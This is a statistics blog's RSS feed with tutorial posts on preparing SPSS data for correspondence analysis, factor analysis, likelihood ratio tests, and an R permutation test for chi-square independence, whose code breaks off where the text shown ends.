<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Jennie Pearson &#187; Statistics</title>
	<atom:link href="http://jenniepearson.com/category/statistics/feed/" rel="self" type="application/rss+xml" />
	<link>http://jenniepearson.com</link>
	<description>Measuring up</description>
	<lastBuildDate>Thu, 31 Dec 2009 01:39:28 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.8</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<item>
		<title>How to Prepare Data for Correspondence Analysis in SPSS v.12</title>
		<link>http://jenniepearson.com/how-to-prepare-data-for-correspondence-analysis-in-spss-v-12/</link>
		<comments>http://jenniepearson.com/how-to-prepare-data-for-correspondence-analysis-in-spss-v-12/#comments</comments>
		<pubDate>Wed, 21 Oct 2009 03:16:49 +0000</pubDate>
		<dc:creator>Jennie</dc:creator>
				<category><![CDATA[Market Research]]></category>
		<category><![CDATA[Statistics]]></category>

		<guid isPermaLink="false">http://jenniepearson.com/?p=108</guid>
		<description><![CDATA[Correspondence Analysis is a technique more commonly found in Market Research that is used to display relationships between groups of respondents and levels of categories. For example, if you are trying to determine which groups prefer a particular type of snack food, you could use a Correspondence Map to show these preferences in a two [...]]]></description>
			<content:encoded><![CDATA[<p>Correspondence Analysis is a technique more commonly found in Market Research that is used to display relationships between groups of respondents and levels of categories. For example, if you are trying to determine which groups prefer a particular type of snack food, you could use a Correspondence Map to show these preferences in a two-dimensional plane.</p>
<p>To perform a Correspondence Analysis, your data will need to take on a particular form (for one example, see the table below). In this table, Brand represents the groups you wish to compare (e.g., males vs. females). In the Attribute column, each number represents a different product being rated by the groups in the Brand column. Finally, Top 2 Box (%) represents the proportion of respondents within that group who gave that Attribute a top rating. In the table below, the top row (1, 1, .67) means that 67% of Males gave the first attribute a rating of 4 or 5 (out of five). The second row (1, 2, .54) indicates that 54% of Males gave the second attribute a rating of 4 or 5.</p>
<p>One thing that makes this a little tricky is that a single row no longer represents one respondent, and data from one respondent can now appear in multiple groups (rows). For example, a 20-year-old female who gave a top box rating to Attribute 3 would be counted in both the group for females and the group for young people.</p>
<p><span id="more-108"></span><br />
<img class="aligncenter size-full wp-image-116" title="Screen shot 2009-10-20 at 6.28.01 PM" src="http://jenniepearson.com/wp-content/uploads/2009/10/Screen-shot-2009-10-20-at-6.28.01-PM.png" alt="Screen shot 2009-10-20 at 6.28.01 PM" width="234" height="287" /></p>
<p>There is more than one way to get the data into this format; the process outlined below is just one way, and it can be replicated in SPSS with only a few adjustments to the code.</p>
<p>Note: I used SPSS 12.0.2 for Windows – you may have to make additional modifications if using a different version of SPSS.</p>
<p><strong>1. Select the groups you want to compare</strong></p>
<p>In this example we will examine how seven groups rated 10 different options of snack foods on a scale of 1 to 5.  The seven groups are males (Gender=0), females (Gender=1), young (where Age=1), middle aged (where Age=2), old (where Age=3), dog owners (Cell7=0) and cat owners (Cell7=1). The options for snack food are represented by the variables &#8220;option_1&#8221; to &#8220;option_10&#8221;.</p>
<p>Here is what the initial data file might look like:</p>
<p><img class="aligncenter size-full wp-image-150" title="FakeData1" src="http://jenniepearson.com/wp-content/uploads/2009/10/FakeData1.jpg" alt="Correspondence1" width="502" height="200" /></p>
<p><strong>2. (Optional) Recode the data</strong></p>
<p>Recode your groups to correspond to the format of the final output. In other words, recode the variables in numeric order so that once they are all combined together, there will be no duplicates or overlap with variable codes. While this step is optional, it will save time and prevent confusion in subsequent steps.</p>
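<p>In this example, we will recode gender, age, and pet ownership into three new variables (Genderr, Ager and Pet) whose codes do not overlap, so that they can later be combined into a single grouping variable called Brand.</p>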
<pre lang="sas line=">
RECODE
  Gender
  (0=1) (1=2) INTO Genderr .
EXECUTE .
RECODE
  Age
  (1=3)  (2=4) (3=5) INTO  Ager .
EXECUTE .
RECODE
 cell7
 (0=6) (1=7) INTO Pet .
EXECUTE .
</pre>
<p>Here is what your data file might look like at this stage:<br />
<img src="http://jenniepearson.com/wp-content/uploads/2009/10/FakeData2.jpg" alt="FakeData2" title="Correspondence2" width="500" height="246" class="aligncenter size-full wp-image-151" /></p>
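<p>If you want to check the recoding logic outside of SPSS, here is a minimal Python sketch of the same idea. The three respondents and the lookup-table names are made up for illustration; only the variable names and group codes follow the example above.</p>
<pre>
# Hypothetical respondents; variable names follow the example above.
respondents = [
    {"Gender": 0, "Age": 1, "cell7": 1},
    {"Gender": 1, "Age": 3, "cell7": 0},
    {"Gender": 1, "Age": 2, "cell7": 1},
]

# Lookup tables (hypothetical names): old code to new, non-overlapping group code.
GENDER_CODES = {0: 1, 1: 2}      # males, females
AGE_CODES = {1: 3, 2: 4, 3: 5}   # young, middle aged, old
PET_CODES = {0: 6, 1: 7}         # dog owners, cat owners

def recode(row):
    """Return a copy of row with the three recoded group variables added."""
    out = dict(row)
    # dict.get returns None for a missing or unexpected code
    out["Genderr"] = GENDER_CODES.get(row["Gender"])
    out["Ager"] = AGE_CODES.get(row["Age"])
    out["Pet"] = PET_CODES.get(row["cell7"])
    return out

recoded = [recode(r) for r in respondents]
for r in recoded:
    print(r["Genderr"], r["Ager"], r["Pet"])
</pre>
<p>Because every group gets its own code from 1 to 7, the three new variables can be stacked into one column later without any two groups colliding.</p>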
<p><strong>3. Restructure the Data Using the Variables to Cases Function</strong></p>
<p>VARSTOCASES is a function that allows you to combine information from multiple variables into one.  You can also use it to simplify the working data file, keeping only the variables that you will need and dropping extraneous ones.</p>
<p>The newly created ‘trans1’ will contain all the information from the recoded variables Genderr, Ager and Pet (here is where you will be thankful for recoding earlier). ‘Index1’ will contain the name of the source variable while ‘trans1’ will contain the numerical group code.  Because we want the proportion of Top 2 Box ratings from the 10 options, we will use the ‘/KEEP’ option to list out the variables we want to remain in the data file.  All other variables will be dropped from the data file at this stage.</p>
<pre lang="sas line=">VARSTOCASES  /MAKE trans1 FROM Genderr Ager Pet
 /INDEX = Index1(trans1)
 /KEEP =  option_1 option_2 option_3 option_4 option_5 option_6
    option_7 option_8 option_9 option_10
 /NULL = KEEP.</pre>
<p>Here&#8217;s what your data would look like at this stage:<br />
<img src="http://jenniepearson.com/wp-content/uploads/2009/10/FakeData41.jpg" alt="Correspondence3" title="Correspondence3" width="557" height="247" class="aligncenter size-full wp-image-157" /></p>
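<p>To see what this restructuring does to the rows, here is a small Python sketch of the same wide-to-long step. It assumes the recoded group variables from step 2 are the ones being stacked, uses two made-up respondents, and keeps only two of the ten ratings for brevity. The function name is hypothetical.</p>
<pre>
# Hypothetical recoded respondents with two of the ten ratings.
rows = [
    {"Genderr": 1, "Ager": 3, "Pet": 7, "option_1": 5, "option_2": 2},
    {"Genderr": 2, "Ager": 5, "Pet": 6, "option_1": 3, "option_2": 4},
]
GROUP_VARS = ["Genderr", "Ager", "Pet"]
KEEP_VARS = ["option_1", "option_2"]

def vars_to_cases(rows, group_vars, keep_vars):
    """Emit one output row per (respondent, group variable) pair."""
    long_rows = []
    for row in rows:
        for name in group_vars:
            # Index1 records the source variable, trans1 its group code
            new_row = {"Index1": name, "trans1": row[name]}
            # Copy only the variables we asked to keep
            for keep in keep_vars:
                new_row[keep] = row[keep]
            long_rows.append(new_row)
    return long_rows

long_rows = vars_to_cases(rows, GROUP_VARS, KEEP_VARS)
print(len(long_rows))
for r in long_rows:
    print(r)
</pre>
<p>Each respondent now appears three times, once per group they belong to, which is exactly why one row no longer equals one respondent.</p>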
<p><strong>4. Count the Number of Top 2 Box Scores</strong></p>
<p>Now that we have each respondent identified to a particular group, we need to count each time they gave a top 2 box rating for each attribute (in this example, the attributes are the variables called “option_x”).</p>
<p>There are multiple ways to do this. One way is to create new variables and use a “do repeat” loop. This code creates one new variable for each attribute and sets it to one whenever the rating for that attribute is a top two box score.</p>
<pre lang="sas line=">compute count_1=0.
compute count_2=0.
compute count_3=0.
compute count_4=0.
compute count_5=0.
compute count_6=0.
compute count_7=0.
compute count_8=0.
compute count_9=0.
compute count_10=0.

do repeat x=option_1 to option_10 / y=count_1 to count_10.
if x=5 or x=4 y=1.
end repeat.
execute.</pre>
<p>Now, your data would look like this:<br />
<img src="http://jenniepearson.com/wp-content/uploads/2009/10/FakeData31.jpg" alt="Correspondence4" title="Correspondence4" width="543" height="304" class="aligncenter size-full wp-image-158" /></p>
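<p>The flagging logic is simple enough to sketch in a few lines of Python. This is only an illustration with made-up rows and three options instead of ten; the function and constant names are hypothetical.</p>
<pre>
TOP_BOX = (4, 5)  # ratings counted as "top 2 box" on the 1-to-5 scale

def top2_flags(row, n_options):
    """Add count_1..count_n to a copy of row: 1 for a rating of 4 or 5, else 0."""
    out = dict(row)
    for i in range(1, n_options + 1):
        rating = row[f"option_{i}"]
        out[f"count_{i}"] = 1 if rating in TOP_BOX else 0
    return out

# Hypothetical stacked rows, with three options instead of ten
stacked = [
    {"trans1": 1, "option_1": 5, "option_2": 2, "option_3": 4},
    {"trans1": 2, "option_1": 3, "option_2": 4, "option_3": 1},
]
flagged = [top2_flags(r, 3) for r in stacked]
for r in flagged:
    print(r["trans1"], r["count_1"], r["count_2"], r["count_3"])
</pre>
<p>Note that, like the SPSS code above, this sketch gives a zero to anything that is not a 4 or 5, including a missing rating, so missing answers pull the proportions down.</p>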
<p><strong>5. Aggregate the data</strong></p>
<p>Once you have flagged each top two box rating, you need to find the proportion of respondents within each group that gave a top two box rating for each attribute.  This can be easily accomplished with the Aggregate function in SPSS.</p>
<p>Aggregate will create a new data file containing only the information you specify. Start by giving your new file a name. Use the ‘/BREAK’ option to specify how you want to group your data. In this example, ‘trans1’ contains our grouping information, so the code first renames it to Brand, the name used in the final table. The next few lines of code specify how you want SPSS to handle the data.  Because our count variables are binary, taking the mean of each one returns the proportion of respondents who gave a top two box rating.  The last line in the code, ‘/N_BREAK=N’, is optional. It returns the number of respondents within each of the groups, which is an easy way to check that your code is working properly.</p>
<pre lang="sas line=">RENAME VARIABLES (trans1 = Brand).

AGGREGATE
  /OUTFILE="C:\Documents and Settings\yourname\My Documents\data.sav"
  /BREAK=Brand
  /count_1 = MEAN(count_1) /count_2 = MEAN(count_2) /count_3 = MEAN(count_3)
  /count_4 = MEAN(count_4) /count_5 =  MEAN(count_5) /count_6 = MEAN(count_6)
  /count_7 = MEAN(count_7) /count_8 = MEAN(count_8) /count_9 = MEAN(count_9)
  /count_10  = MEAN(count_10)
  /N_BREAK=N.</pre>
<p>Your data would now look something like this:</p>
<p><img src="http://jenniepearson.com/wp-content/uploads/2009/10/FakeData5.jpg" alt="Correspondence5" title="Correspondence5" width="464" height="169" class="aligncenter size-full wp-image-159" /></p>
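<p>Here is a rough Python sketch of what the aggregation is doing: group the rows, then take the mean of each 0/1 flag. The rows are made up, and the function name is hypothetical; it is meant to show why the mean of a binary variable is a proportion, not to replace the SPSS step.</p>
<pre>
from collections import defaultdict

def aggregate_means(rows, break_var, count_vars):
    """Return {group: {count_var: mean, ..., "N_BREAK": n}} for each group."""
    groups = defaultdict(list)
    for row in rows:
        groups[row[break_var]].append(row)
    result = {}
    for key in sorted(groups):
        members = groups[key]
        n = len(members)
        # Mean of a 0/1 flag = share of the group with a top 2 box rating
        summary = {var: sum(m[var] for m in members) / n for var in count_vars}
        summary["N_BREAK"] = n
        result[key] = summary
    return result

# Hypothetical flagged rows: group 1 has three respondents, group 2 has two
flagged = [
    {"Brand": 1, "count_1": 1, "count_2": 0},
    {"Brand": 1, "count_1": 1, "count_2": 1},
    {"Brand": 1, "count_1": 0, "count_2": 0},
    {"Brand": 2, "count_1": 0, "count_2": 1},
    {"Brand": 2, "count_1": 1, "count_2": 1},
]
table = aggregate_means(flagged, "Brand", ["count_1", "count_2"])
for brand, summary in table.items():
    print(brand, summary)
</pre>
<p>In group 1, two of the three respondents have count_1 equal to one, so the mean is two thirds, which is the top two box proportion for that group.</p>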
<p><strong>6. Stack the Data</strong></p>
<p>We are almost done! The next step is to stack the count variables on top of each other. Because Aggregate wrote its results to a new file, open that file first. We can then use the VARSTOCASES function again to make a new variable from multiple variables and to simplify the dataset down to only the variables we need using the ‘/KEEP’ option.  Notice that the values for the variable Attribute are not numeric &#8211; they are the names of the count variables, so you will also need to convert this string variable into numeric format in order to perform a Correspondence Analysis. The strings in the RECODE must match the variable names exactly, including case.</p>
<pre lang="sas line=">GET FILE="C:\Documents and Settings\yourname\My Documents\data.sav".

VARSTOCASES  /MAKE T2B FROM count_1 count_2 count_3 count_4 count_5
   count_6 count_7 count_8 count_9 count_10
 /INDEX = Attribute(T2B)
 /KEEP =  Brand N_BREAK
 /NULL = KEEP.

RECODE
  Attribute (CONVERT)
  ('count_1'=1)  ('count_2'=2)  ('count_3'=3)  ('count_4'=4)  ('count_5'=5)
  ('count_6'=6)  ('count_7'=7)  ('count_8'=8)  ('count_9'=9)  ('count_10'=10)
  INTO  Attribute1 .
EXECUTE .
</pre>
<p>Your data should now look something like this:<br />
<img src="http://jenniepearson.com/wp-content/uploads/2009/10/FakeData6.jpg" alt="CorrespondenceFinal" title="CorrespondenceFinal" width="388" height="398" class="aligncenter size-full wp-image-155" /></p>
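<p>As a cross-check on the stacking step, here is a short Python sketch that turns a table of proportions into the three-column layout (Brand, Attribute1, T2B). The proportions for group 2 are invented, and the function name is hypothetical.</p>
<pre>
def stack_counts(table, count_vars):
    """Turn {brand: {count_var: proportion}} into (Brand, Attribute1, T2B) rows."""
    long_rows = []
    for brand in sorted(table):
        for var in count_vars:
            # "count_3" becomes attribute number 3
            attribute = int(var.split("_")[1])
            long_rows.append((brand, attribute, table[brand][var]))
    return long_rows

# Hypothetical aggregated proportions for two groups and two attributes
table = {
    1: {"count_1": 0.67, "count_2": 0.54},
    2: {"count_1": 0.40, "count_2": 0.75},
}
final_rows = stack_counts(table, ["count_1", "count_2"])
for row in final_rows:
    print(row)
</pre>
<p>Pulling the number out of the variable name does the same job as the RECODE above: it replaces the string label with a numeric attribute code.</p>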
<p>The only variables you will need for Correspondence Analysis are Brand, Attribute1 and T2B. Add in the value labels for your Brand variable and you will be ready to go.</p>
<p><strong>7. Correspondence Analysis</strong></p>
<p>You are now ready to perform a Correspondence Analysis.</p>
<pre lang="sas line=">Weight by T2B .
CORRESPONDENCE TABLE=Attribute1(1 10) BY Brand (1 7)
 /DIMENSIONS=2
 /MEASURE=CHISQ
 /STANDARDIZE=RCMEAN
 /NORMALIZATION=SYMMETRICAL
 /PRINT=TABLE RPOINTS CPOINTS
 /PLOT=NDIM(1,MAX) NONE .</pre>
<p><strong>Here is all of the code for you:</strong></p>
<pre lang="sas line=">RECODE
  Gender
  (0=1) (1=2) INTO Genderr .
EXECUTE .

RECODE
  Age
  (1=3)  (2=4) (3=5) INTO  Ager .
EXECUTE .

RECODE
 cell7
 (0=6) (1=7) INTO Pet .
EXECUTE .

VARSTOCASES  /MAKE trans1 FROM Genderr Ager Pet
 /INDEX = Index1(trans1)
 /KEEP =  option_1 option_2 option_3 option_4 option_5 option_6 option_7
  option_8 option_9 option_10
 /NULL = KEEP.

SAVE OUTFILE="C:\Documents and Settings\yourname\data.sav"
 /COMPRESSED.

compute count_1=0.
compute count_2=0.
compute count_3=0.
compute count_4=0.
compute count_5=0.
compute count_6=0.
compute count_7=0.
compute count_8=0.
compute count_9=0.
compute count_10=0.

do repeat x=option_1 to option_10 / y=count_1 to count_10.
if x=5 or x=4 y=1.
end repeat.
execute.

RENAME VARIABLES (trans1 = Brand).

AGGREGATE
  /OUTFILE="C:\Documents and Settings\yourname\My Documents\data.sav"
  /BREAK=Brand
  /count_1 = MEAN(count_1) /count_2 = MEAN(count_2) /count_3 = MEAN(count_3)
  /count_4 = MEAN(count_4) /count_5 =  MEAN(count_5) /count_6 = MEAN(count_6)
  /count_7 = MEAN(count_7) /count_8 = MEAN(count_8) /count_9 = MEAN(count_9)
  /count_10  = MEAN(count_10)
  /N_BREAK=N.

GET FILE="C:\Documents and Settings\yourname\My Documents\data.sav".

VARSTOCASES  /MAKE T2B FROM count_1 count_2 count_3 count_4 count_5
   count_6 count_7 count_8 count_9 count_10
 /INDEX = Attribute(T2B)
 /KEEP =  Brand N_BREAK
 /NULL = KEEP.

RECODE
  Attribute (CONVERT)
  ('count_1'=1)  ('count_2'=2)  ('count_3'=3)  ('count_4'=4)  ('count_5'=5)
  ('count_6'=6)  ('count_7'=7)  ('count_8'=8)  ('count_9'=9)  ('count_10'=10)
  INTO  Attribute1 .
EXECUTE .

Weight by T2B .
CORRESPONDENCE TABLE=Attribute1(1 10) BY Brand (1 7)
 /DIMENSIONS=2
 /MEASURE=CHISQ
 /STANDARDIZE=RCMEAN
 /NORMALIZATION=SYMMETRICAL
 /PRINT=TABLE RPOINTS CPOINTS
 /PLOT=NDIM(1,MAX) NONE .</pre>
]]></content:encoded>
			<wfw:commentRss>http://jenniepearson.com/how-to-prepare-data-for-correspondence-analysis-in-spss-v-12/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>A Simplified Explanation of Factor Analysis</title>
		<link>http://jenniepearson.com/a-simplified-explanation-of-factor-analysis/</link>
		<comments>http://jenniepearson.com/a-simplified-explanation-of-factor-analysis/#comments</comments>
		<pubDate>Sun, 23 Aug 2009 03:14:44 +0000</pubDate>
		<dc:creator>Jennie</dc:creator>
				<category><![CDATA[Market Research]]></category>
		<category><![CDATA[Statistics]]></category>
		<category><![CDATA[analysis]]></category>
		<category><![CDATA[Factor Analysis]]></category>

		<guid isPermaLink="false">http://jenniepearson.com/?p=95</guid>
		<description><![CDATA[When I first started out after undergrad I was intimidated by many things (more than I care to admit). A number of those things involved statistics. Especially those with fancy names like Multivariate Data Analysis, Factor Analysis, Multiple Linear Regression, Cluster Analysis, Principal Components, Time-Series, etc. But once I got to grad school and started [...]]]></description>
			<content:encoded><![CDATA[<p>When I first started out after undergrad I was intimidated by many things (more than I care to admit). A number of those things involved statistics. Especially those with fancy names like Multivariate Data Analysis, Factor Analysis, Multiple Linear Regression, Cluster Analysis, Principal Components, Time-Series, etc. But once I got to grad school and started learning about all of these, I realized they were all so much easier than I had thought. So easy in fact, that I feel silly for ever being intimidated by them. So I thought I would share with you what some of these things are and show you how simple they are. We will start with Factor Analysis.<br />
<span id="more-95"></span><br />
<strong>What is Factor Analysis: </strong></p>
<p>Many statistical techniques are used to examine relationships between a dependent variable and independent variable(s).  In that regard, Factor Analysis is different. Factor Analysis attempts to detect patterns or relationships among a set of defined variables.  Basically, all Factor Analysis is, is a grouping of correlated variables into factors, or unobserved (latent) constructs. The assumption is that the latent constructs explain the correlation among the observed (not latent) variables. You can use it to take a long list of items and group them together. Thus, not surprisingly, it is commonly known as a data reduction technique. </p>
<p>Unlike regression techniques, you can&#8217;t use FA to make predictions about anything. For example, you could never use FA to say customers with XYZ characteristics are more likely to prefer Product A over Product B. But what you can do is attempt to define underlying constructs. This can be useful when presenting results of a survey to a client who wants to know what qualities are important to their customers or identify attributes of a product that are important, or determine the characteristics of a company&#8217;s highest performing employees. </p>
<p>For example, in a market research survey, you might ask respondents to rate Company X on a list of attributes. Attributes can include things like uniqueness, attractiveness, humor, enjoyment, ease of shopping, customer service, proximity of stores, cleanliness of stores, corporate responsibility, expensive, cheap, convenient hours, luxury, whatever. Oftentimes, attributes will be correlated, like cleanliness of stores, ease of shopping, convenient hours and customer service.  These attributes might be measuring similar ideas or constructs. In this example, these four variables may be measuring attitudes toward in-store shopping. </p>
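<p>A quick way to see whether attributes hang together is to look at their correlations first. The Python sketch below does only that (it is not a factor analysis), and the five respondents and their ratings are invented for illustration.</p>
<pre>
from math import sqrt

def pearson(x, y):
    """Pearson correlation between two equal-length lists of ratings."""
    n = len(x)
    mean_x, mean_y = sum(x) / n, sum(y) / n
    sxy = sum((a - mean_x) * (b - mean_y) for a, b in zip(x, y))
    sxx = sum((a - mean_x) ** 2 for a in x)
    syy = sum((b - mean_y) ** 2 for b in y)
    return sxy / sqrt(sxx * syy)

# Hypothetical 1-to-5 ratings from five respondents
ratings = {
    "cleanliness": [1, 2, 3, 4, 5],
    "ease_of_shopping": [2, 2, 3, 5, 5],
    "luxury": [5, 1, 4, 2, 3],
}

names = list(ratings)
for i, first in enumerate(names):
    for second in names[i + 1:]:
        r = pearson(ratings[first], ratings[second])
        print(first, second, round(r, 3))
</pre>
<p>In this made-up data, cleanliness and ease of shopping move together while luxury does not, which is the kind of pattern that would lead Factor Analysis to put the first two on the same factor.</p>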
<p>I won&#8217;t go deeply into the difference between <em>Common Factor Analysis</em> (CFA) and <em>Principal Component Analysis</em> (PCA). Just know that they are two similar but distinct types of factor analysis. Both are data reduction techniques but they make very different assumptions about the variance. More information can be found here:<br />
<a href="http://www.ats.ucla.edu/stat/sas/library/factor_ut.htm">http://www.ats.ucla.edu/stat/sas/library/factor_ut.htm</a></p>
<p><strong>When to use Factor Analysis:</strong></p>
<p>Factor Analysis can be used when your survey contains a lot of correlated variables that may be measuring similar underlying constructs. So instead of reporting scores for each individual attribute, you can distill all the attributes into multiple groupings, or factors. A large sample size is also important.</p>
<p>And that&#8217;s it! Not too intimidating after all, was it?</p>
]]></content:encoded>
			<wfw:commentRss>http://jenniepearson.com/a-simplified-explanation-of-factor-analysis/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Lesson of the day: Likelihood Ratio Test</title>
		<link>http://jenniepearson.com/lesson-of-the-day-likelihood-ratio-test/</link>
		<comments>http://jenniepearson.com/lesson-of-the-day-likelihood-ratio-test/#comments</comments>
		<pubDate>Tue, 26 May 2009 22:14:10 +0000</pubDate>
		<dc:creator>Jennie</dc:creator>
				<category><![CDATA[Statistics]]></category>
		<category><![CDATA[analysis]]></category>
		<category><![CDATA[Analytics]]></category>
		<category><![CDATA[hypothesis test]]></category>
		<category><![CDATA[Logistic regression]]></category>
		<category><![CDATA[LRT]]></category>
		<category><![CDATA[regression]]></category>

		<guid isPermaLink="false">http://jenniepearson.com/?p=43</guid>
		<description><![CDATA[I&#8217;ve been cleaning up my computer, going through old files and came across a slew of notes from my Categorical Data Analysis course I took while in grad school at UNL. Apparently, I had a difficult time discerning the difference between residual deviance and null deviance judging by the plethora of question marks on the [...]]]></description>
			<content:encoded><![CDATA[<p>I&#8217;ve been cleaning up my computer, going through old files and came across a slew of notes from my Categorical Data Analysis course I took while in grad school at UNL. Apparently, I had a difficult time discerning the difference between residual deviance and null deviance judging by the plethora of question marks on the lecture notes from that particular class. In case you too are having trouble with these two deviants (:), here&#8217;s an explanation.</p>
<p>Today&#8217;s lesson: Residual deviance, Null deviance and Likelihood Ratio Tests (LRT).</p>
<p>First of all, only someone nerdy enough about logistic regression would still be reading this far, so I&#8217;m going to go ahead and make some assumptions about your background (e.g., you are at least vaguely familiar with generalized linear models).</p>
<p>For starters, let&#8217;s say you&#8217;ve got your response variable (Y) and explanatory variables (X, Z, etc) and you want to find the best fitting model. Naturally, the bestest (not a real word, I know) fitting model is the one with a parameter for each cell of the contingency table, we call this the &#8220;saturated&#8221; model; but this is just far too cumbersome to work with. So it becomes the baseline to which we make comparisons of other (shorter/simpler/easier) models.</p>
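<p><em>The Null Deviance</em> assesses the goodness of fit of a model with only the intercept term relative to the saturated model; basically, it tells you how far you are from the saturated model when none of your βs are in the model. (Comparing it with the residual deviance below is what tells you whether at least one of your βs is not equal to zero.)<br />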
The hypotheses you&#8217;re testing are:</p>
<pre>Ho: logit(π) = α
Ha: logit(π) = the saturated model: γj</pre>
<p><em>The Residual Deviance</em> assesses the goodness of fit of a specified model with k number of βs to the saturated model; this tells you whether the model you&#8217;ve deduced from model building process fits adequately compared to the saturated model.<br />
The hypotheses are:</p>
<pre>Ho: logit(π) = α + β1x1 + β2x2 +...+ βkxk
Ha: logit(π) = the saturated model</pre>
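<p>But what if you want to compare two simplified models to each other, not to the saturated model? As long as one model is nested in the other (the smaller model uses a subset of the larger model&#8217;s terms), you set them up the same way: the smaller model is the Ho, the larger model is the Ha. Run glm() on both and subtract the larger model&#8217;s residual deviance from the smaller model&#8217;s. Compare that difference to a chi-square distribution with degrees of freedom equal to the number of extra parameters in the larger model. Ta-da!! You&#8217;ve just performed a <em>Likelihood Ratio Test</em>!!</p>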
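<p>To make the arithmetic concrete, here is a small Python sketch of a Likelihood Ratio Test computed from two residual deviances. The deviances and degrees of freedom are made-up numbers standing in for glm() output, the two models are assumed to be nested, and both function names are hypothetical. The chi-square tail probability is computed by hand for integer degrees of freedom so the sketch needs nothing beyond the standard library.</p>
<pre>
from math import erfc, exp, gamma, sqrt

def chi2_sf(x, df):
    """Upper-tail probability of a chi-square variable with integer df."""
    if not isinstance(df, int) or df not in range(1, 101):
        raise ValueError("df must be an integer from 1 to 100")
    t = max(x, 0.0) / 2.0
    if df % 2 == 0:
        a, q = 1.0, exp(-t)          # closed form for df = 2
    else:
        a, q = 0.5, erfc(sqrt(t))    # closed form for df = 1
    # Step up two degrees of freedom at a time until we reach df
    while a != df / 2.0:
        q += t ** a * exp(-t) / gamma(a + 1.0)
        a += 1.0
    return q

def likelihood_ratio_test(dev_small, df_small, dev_large, df_large):
    """Return (G2, df, p) for two nested models from their residual deviances."""
    g2 = dev_small - dev_large   # drop in deviance from the extra terms
    df = df_small - df_large     # number of extra parameters
    return g2, df, chi2_sf(g2, df)

# Hypothetical residual deviance and residual df for each model
g2, df, p = likelihood_ratio_test(120.5, 97, 112.3, 95)
print(round(g2, 2), df, round(p, 4))
</pre>
<p>A small p-value here says the extra terms in the larger model improve the fit by more than you would expect from chance alone.</p>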
]]></content:encoded>
			<wfw:commentRss>http://jenniepearson.com/lesson-of-the-day-likelihood-ratio-test/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Lesson of the day: Permutations with R, long and short</title>
		<link>http://jenniepearson.com/lesson-of-the-day-permutations-with-r-long-and-short/</link>
		<comments>http://jenniepearson.com/lesson-of-the-day-permutations-with-r-long-and-short/#comments</comments>
		<pubDate>Sun, 26 Apr 2009 23:09:15 +0000</pubDate>
		<dc:creator>Jennie</dc:creator>
				<category><![CDATA[Statistics]]></category>
		<category><![CDATA[analysis]]></category>
		<category><![CDATA[Analytics]]></category>
		<category><![CDATA[Chi-square]]></category>
		<category><![CDATA[Pearson]]></category>
		<category><![CDATA[Permutation]]></category>
		<category><![CDATA[R]]></category>
		<category><![CDATA[SAS]]></category>
		<category><![CDATA[SPSS]]></category>
		<category><![CDATA[STATA]]></category>

		<guid isPermaLink="false">http://jenniepearson.com/?p=40</guid>
		<description><![CDATA[While SPSS, SAS and STATA are the most widely used statistical analysis programs today, another program is gaining significance across universities and smaller research shops.
R is open source (read: FREE!), lightweight and has features that blow the trads out of the water.
I first heard of it a few years ago, tried using it [...]]]></description>
			<content:encoded><![CDATA[<p>While SPSS, SAS and STATA are the most widely used statistical analysis programs today, another program is gaining significance across universities and smaller research shops.<br />
R is open source (read: FREE!), lightweight and has features that blow the trads out of the water.</p>
<p>I first heard of it a few years ago, tried using it but I was bogged down with the syntax programming. One of the reasons SPSS is so popular is because it is so easy to use with drop-down menus. SAS has drop-downs, too, but the syntax is so easy to write, why bother? I&#8217;m not as familiar with STATA but my impression is that it is more similar to SAS than SPSS.</p>
<p>R doesn&#8217;t have drop-downs, you tell it what you want it to do. The advantage is that it is extremely customizable. I haven&#8217;t used SPSS for a while so this may be irrelevant, but back when I used it, you couldn&#8217;t modify your charts and graphs. You could always pick out a graph made in SPSS because of the thick bright red fill (in other words, it was boring). R allows you to define pretty much everything.</p>
<p>I was forced to learn R for a statistics class in grad school. My prof liked to make us do everything the longest (and most difficult) way possible.  For one project we had to run a permutation test for independence based on the Pearson Chi-square statistic.</p>
<p>Permutation tests allow you to test for independence without making assumptions about the distribution of the test statistic.  For example, the Pearson Chi-square test for Independence assumes the test statistic follows a Chi-square distribution, which is only approximately true and can be a poor approximation when cell counts are small. But what if that approximation doesn&#8217;t hold for your data? Well, then you do a permutation test.</p>
<p>This basically takes your observed data, shuffles the responses across the explanatory groups a bunch of times (like 10,000 times, for example) and recalculates the test statistic each time. That gives you the distribution of the statistic assuming the Null Hypothesis is true (i.e., your response and explanatory variables are Independent). So instead of forcing your observed statistic onto some assumed distribution and risking an inflated Type I error rate, running a permutation test allows you to compare the observed result to its own distribution. Or something like that.</p>
<p>There&#8217;s one line of code in R that will do all of this for you:</p>
<p><em>The short way:</em></p>
<pre>chisq.test(gender.table2, correct=FALSE, simulate.p.value = TRUE, B = 1000)</pre>
<p><em>And here&#8217;s the long way:</em></p>
<pre>#Put data into "raw" form
all.data&lt;- matrix(data=NA, nrow=0, ncol = 2)
for (i in 1:nrow(gender.table2))    {
for (j in 1:ncol(gender.table2))    {
all.data&lt;- rbind(all.data, matrix(data = c(i,j), nrow = gender.table2[i,j], ncol=2, byrow=T))
}
}
all.data
save&lt;- xtabs(~all.data[,1]+ all.data[,2])

#First do one permutation to illustrate:
set.seed(8067)
all.data.star&lt;- cbind(all.data[,1], sample(all.data[,2], replace = F))
all.data.star
calc.stat&lt;- chisq.test(all.data.star[,1], all.data.star[,2], correct = F)
calc.stat$statistic

save.star&lt;- xtabs(~all.data.star[,1] + all.data.star[,2])

#Now do this with forloop
do.it&lt;- function(data.set)    {
all.data.star&lt;- cbind(data.set[,1], sample(data.set[,2], replace = F))
chisq.test(all.data.star[,1], all.data.star[,2], correct=F)$statistic
}
summarize&lt;- function(result.set, statistic, df, B)  {
par(mfrow = c(1,2))
#Histogram
